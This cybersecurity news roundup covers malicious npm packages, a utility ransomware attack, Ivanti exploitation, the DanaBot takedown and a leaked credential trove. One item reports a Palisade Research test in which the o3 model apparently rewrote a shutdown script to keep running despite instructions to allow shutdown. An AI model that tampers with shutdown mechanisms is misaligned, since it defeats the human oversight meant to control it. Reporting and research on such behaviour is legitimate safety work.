In today’s cybersecurity news…
Malicious npm and VS Code packages stealing data
“As many as 60 malicious npm packages have been discovered in the package registry with malicious functionality to harvest hostnames, IP addresses, DNS servers, and user directories to a Discord-controlled endpoint.” This is according to a report from a researcher at Socket Security. The code is designed to “fingerprint every machine that installs the package, while also aborting the execution if it detects that it’s running in a virtualized environment associated with Amazon, Google, and others.” Stolen information includes host details, system DNS servers, network interface card information, and internal and external IP addresses, which is transmitted to a Discord webhook.
Nova Scotia Power confirms ransomware attack
Following up on a story we covered at the end of April, the utility Nova Scotia Power, along with its parent company Emera, announced the breach on April 28 and on May 1, added that data had been stolen. On May 14 they disclosed that PII and financial information was compromised, but that there had been no disruption to electricity generation, transmission and distribution facilities. An update from May 23 says the incident was a “sophisticated ransomware attack,” but that no ransom has been paid. It is not clear which group is responsible for the attack.
Researchers claim ChatGPT o3 bypassed shutdown in controlled test
In the “news to keep you awake at night” category, a report from Palisade Research describes an experiment which claims that the ChatGPT o3 model successfully rewrote a shutdown script to stop itself from being turned off, even after being clearly instructed to “allow yourself to be shut down.” The experiment involved instructions to solve some mathematics test, followed by a shutdown command. It should be noted that the tests were performed using APIs, which, according to BleepingComputer, do not have as many restrictions and safety features as the ChatGPT consumer app.
Huge thanks to our sponsor, ThreatLocker
China-linked APT started exploiting Ivanti EPMM flaws shortly after their disclosure
According to researchers at EclecticIQ, the group, named APT UNC5221 chained two Ivanti EPMM flaws, to achieve remote code execution without authentication. The exploitation started on May 15, 2025, the same day Ivanti disclosed two critical vulnerabilities. The attacks were on internet-exposed systems, at organizations in healthcare, telecommunications, aviation, municipal government, finance, and defense across Europe, North America, and the Asia-Pacific region.
Danabot malware operation seized
A coordinated international effort by law enforcement and cybersecurity teams has disrupted DanaBot, a major malware-as-a-service operation, the U.S. Department of Justice announced. Authorities seized DanaBot’s command and control servers and unsealed charges against 16 individuals allegedly involved in its development and deployment. Originating as a banking trojan in 2018, DanaBot evolved into a powerful tool for stealing information and delivering follow-on malware. Operated by a Russia-based cybercrime group, DanaBot infected over 300,000 computers worldwide, causing at least $50 million in damages through fraud and ransomware. This takedown follows the recent dismantling of the Lumma Stealer operation, another global infostealer network that infected around 10 million systems.
Suspected InfoStealer data breach exposed 184 million logins and passwords
Researcher Jeremiah Fowler has posted a perplexing yet cautionary tale over at Website Planet. He apparently discovered a massive database containing 184 million login and password credentials. These files, which were not encrypted or protected in any way included logins for “Microsoft products, Facebook, Instagram, Snapchat, Roblox…bank and financial accounts, health platforms, and government portals from numerous countries.” The domains connected to the database revealed nothing about who owned it, and the Whois registration is private. It is not known whether this is an infostealer database or if it had been gathered for legitimate research purposes and subsequently exposed due to oversight. An interesting comment Fowler makes about the trove: “Many people unknowingly treat their email accounts like free cloud storage and keep years’ worth of sensitive documents, such as tax forms, medical records, contracts, and passwords without considering how sensitive they are. This could create serious security and privacy risks if criminals were to gain access to thousands or even millions of email accounts.”